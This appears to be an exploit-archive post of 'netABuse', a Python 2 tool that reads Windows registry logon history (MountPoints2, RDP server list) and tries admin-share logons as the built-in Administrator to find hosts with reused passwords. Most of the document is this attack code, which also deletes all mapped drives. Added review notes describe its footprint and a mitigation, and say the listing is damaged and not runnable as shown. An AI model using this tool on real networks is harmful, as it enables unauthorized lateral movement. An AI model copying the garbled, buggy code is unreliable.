netABuse - Windows Insufficient Authentication Logic Scanner

2020-04-09 05:49
import os,re,time,signal,sys
from subprocess import *
from multiprocessing import Process
#By John Page (aka hyp3rlinx)
#Apparition Security
#twitter.com/hyp3rlinx
#Advisory: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-NET-USE-INSUFFICIENT-PASSWORD-PROMPT.txt 
#-----------------------------------
#When a remote systems built-in Administrator account is enabled and both the remote and the target system
#passwords match (password reuse) theres no prompt for credentials and we get logged in automagically.
#
#MountPoints2 and Terminal server client hints in the Windows registry can help us.
#Typically, MountPoints2 is used by Forensic analysts to help determine where an attacker laterally moved to previously.
#REG Query HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerMountPoints2 /F "##" (we want network logons)
#MountPoints2 key entries are stored like '##$'
#-----------------------------------------------------------
#
#NOTE(review): this listing appears to have been damaged in extraction - backslashes in the
#registry paths, UNC paths and "\n"/"\r\n" escapes are missing, and the newlines were collapsed.
#It is reproduced here with line breaks restored only; it is not runnable as shown (e.g. the
#rfind("\") below is an unterminated string).  It is written for Python 2 (raw_input, str-typed
#pipe output).  `os` and `signal` are imported but never used.
#
#NOTE(review): observable footprint of the tool as written: reg.exe queries of the MountPoints2
#and "Terminal Server Client\Servers" keys and net.exe runs on the source host, and on every
#target a network logon to the C$ administrative share as the built-in Administrator.  The
#precondition it relies on (the same local Administrator password on source and target) is
#removed by unique per-host local admin passwords.
BANNER="""               |            __ )                       __     _   __|    _     __    |   |   __|   _    |   |   __/  |     ___    |   |  |   | __    __/  _|  _| ___| __| _/    _ ____/  __,_| ____/ ___|                                       By Hyp3rlinx                                                                                                        ApparitionSec"""
#Drive letter used by del_vuln_connection(); Test_Password_Reuse() hard-codes "X:" separately.
DRIVE="X"
#Success marker looked for in `net use` stdout.
FINDME="The command completed successfully."
#reg.exe query for prior network logons (MountPoints2 entries starting with "##").
REG_MOUNT2='REG Query HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerMountPoints2 /F "##"'
#reg.exe recursive query of the Terminal Server Client server history.
REG_RDPUSERS="REG Query "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers""+" /s"
#Set of "ip:Administrator" strings; see the NOTE in Test_Password_Reuse() about which process adds to it.
VULN_FOUND=set()
DELAY=2   #Any lower and we may get inaccurate results.
#Filled in place by rdp_svrs().
rdp_server_lst=[]
#Return prior network logons to remote systems.
def mountpoints2():
    """Query MountPoints2 via reg.exe and return the list of host strings found.

    Returns a (possibly empty) list of unique, non-empty host strings parsed
    from the "##" entries, or False if launching/reading the query failed.
    """
    mntpoint2_connections=[]
    try:
        p = Popen(REG_MOUNT2, stdout=PIPE, stderr=PIPE, shell=True)
        tmp = p.stdout.readlines()
    except Exception as e:
        print("[!] "+str(e))
        return False
    for x in tmp:
        #Each matching line holds an entry like "##<host>#<share>"; keep what sits between
        #the leading "##" and the last "#".
        idx = x.find("##")
        clean = x[idx:]
        idx2 = clean.rfind("#")
        ip = clean[2:idx2]
        #Strip a trailing "#..." segment ending in a letter.  Note the class [A-Z,a-z] also
        #matches a literal comma.
        ip = re.sub(r"#.*[A-Z,a-z]","",ip)
        if ip not in mntpoint2_connections:
            mntpoint2_connections.append(ip)
        #Drops empty strings; runs on every iteration rather than once after the loop.
        mntpoint2_connections = list(filter(None, mntpoint2_connections))
    p.kill()
    return mntpoint2_connections 
#Terminal server client stores remote server connections.
def rdp_svrs():
    """Append the Terminal Server Client server names to the global rdp_server_lst.

    Returns True on success, False if the reg.exe query raised.
    """
    global rdp_server_lst
    try:
        p = Popen(REG_RDPUSERS, stdout=PIPE, stderr=PIPE, shell=True)
        tmp = p.stdout.readlines()
        for key in tmp:
            if key.find("Servers")!=-1:
                #Intended to take the last path component of the subkey name; the "\" literal
                #lost its escaping in this copy.
                pos = key.rfind("\")
                srv = key[pos + 1:].replace("rn","").strip()
                rdp_server_lst.append(srv)
        p.kill()
    except Exception as e:
        print("[!] "+str(e))
        return False
    return True
#Disconnect
def del_vuln_connection(ip):
    """Remove the DRIVE: mapping created by Test_Password_Reuse(); `ip` is unused here."""
    try:
        print("[!] Disconnecting vuln network logon connection.n")
        call(r"net use "+DRIVE+":"+" /del")
    except Exception as e:
        print("[!] "+str(e))
#Check connection
def chk_connection(ip):
    """Send one ping to `ip` and return True only if a "Reply from" line came back.

    Popen.communicate() returns (stdout, stderr); the unpacking below names them in the
    opposite order, so the variable called `stderr` actually holds ping's stdout, which
    is where the reply text appears.
    """
    print("[+] Testing: "+ip)
    sys.stdout.flush()
    cmd = Popen(['ping.exe', ip, "-n", "1"], stderr=PIPE, stdout=PIPE, shell=True)
    stderr, stdout = cmd.communicate()
    if "Reply from" in stderr and "Destination host unreachable" not in stderr:
        print("[*] Target up!")
        return True
    else:
        print("[!] Target unreachable :(")
    return False 
#Test vuln
def Test_Password_Reuse(ip):
    """Try `net use X: \\\\ip\\c$ /user:Administrator` and record `ip` if it succeeds without a prompt.

    The command string is built with shell=True and `ip` inserted unescaped, so a crafted
    registry entry or typed value reaches the shell verbatim.  Error handling matches on
    the English net.exe messages ("error 53", "error 1219", "error 85") - presumably
    locale-dependent.  Always returns None.
    """
    print("[+] Testing "+ip + " the builtin Administrator account.n")
    sys.stdout.flush()
    try:
        p = Popen("net use X: \\"+ip+"\c$ /user:Administrator", stdout=PIPE, stderr=PIPE, shell=True)
        err = p.stderr.readlines()    
        if err:
            e = str(err)
            if e.find("error 53")!=-1:
                print("[*] Network path not foundn")
                return
            elif e.find("error 1219")!=-1:
                print("[*] Target connections to a server or shared resource by the same user, using more than one user name are disallowed.n")
                return
            elif e.find("error 85")!=-1:
                print("[*] The local device name is already in use.n")
                return
            else:
                print(e+"n")            
        tmp = p.stdout.read()
        if FINDME in tmp:
            print("[*] Password reuse for the built-in Administrator found!")
            print("[+] Connected to target: "+ ip)
            #NOTE(review): auth() runs this function in a separate multiprocessing.Process, so
            #this add() lands in the child's copy of VULN_FOUND; the parent's set used for the
            #final summary is not updated by it.
            VULN_FOUND.add(ip+":Administrator")
            del_vuln_connection(ip)
        p.kill()
    except Exception as e:
        print("[!] "+str(e))
#Authenticate
def auth(ip):
    """Run Test_Password_Reuse(ip) in a child process and give it at most ~5 seconds.

    terminate() is called unconditionally after join(timeout=5), so a still-running
    `net use` attempt (e.g. one blocked on a credential prompt) is cut off.
    """
    action_process = Process(target=Test_Password_Reuse, args=(ip,))
    action_process.start()
    action_process.join(timeout=5)
    action_process.terminate()
if __name__ == "__main__":
    print(BANNER)
    print("[+] M$ Windows net use Logon Command")
    print("[+] Insufficient Authentication Logic Scanner")
    print("[+] By hyp3rlinxn")
    print("[!] Deletes existing network logons")
    print("[!] Scans environment for vuln machines.")
    print("[!] To continue hit enter or ctrl+c to abort.")
    raw_input("")    
    print("[+] Deleting any existing network logons to start clean.")    
    #Make sure no exist sessions already exist.
    #This removes every mapped network connection on the machine the script runs on.
    call(r"net use * /del /y")
    sys.stdout.flush()
    time.sleep(1)    
    #Grab previous connections from MountPoints2 if any.    
    rdp_svrs()
    svrlst=mountpoints2()
    if svrlst:
        #The result of this expression is discarded, so the RDP server list is only used
        #when MountPoints2 returned nothing.
        svrlst + rdp_server_lst
    else:
        svrlst = rdp_server_lst    
    if not svrlst:
        print("[*] No MountPoints2 artifacts found, enter an IP.")
        sys.stdout.flush()
        ip=raw_input("[+] Target IP> ")
        if chk_connection(ip): 
            auth(ip)
    else:
        #We have MountPoints2 or RDP Server list IP we can try.
        for ip in svrlst:
            if chk_connection(ip): 
                auth(ip)             
                time.sleep(DELAY) 
    #See the NOTE in Test_Password_Reuse(): entries added by the child processes do not
    #reach this set, so this summary reflects only additions made in the parent.
    if len(VULN_FOUND) != 0:
        print("[*] Located the following vulnerable systems:")
        sys.stdout.flush()
        for v in VULN_FOUND:
            print("[+] "+v)
    else:
        print("[+] All previous attempts failed, enter an IP and give it a shot!.")
        sys.stdout.flush()
        ip=raw_input("[+] Target IP> ")
        if chk_connection(ip): 
            auth(ip)

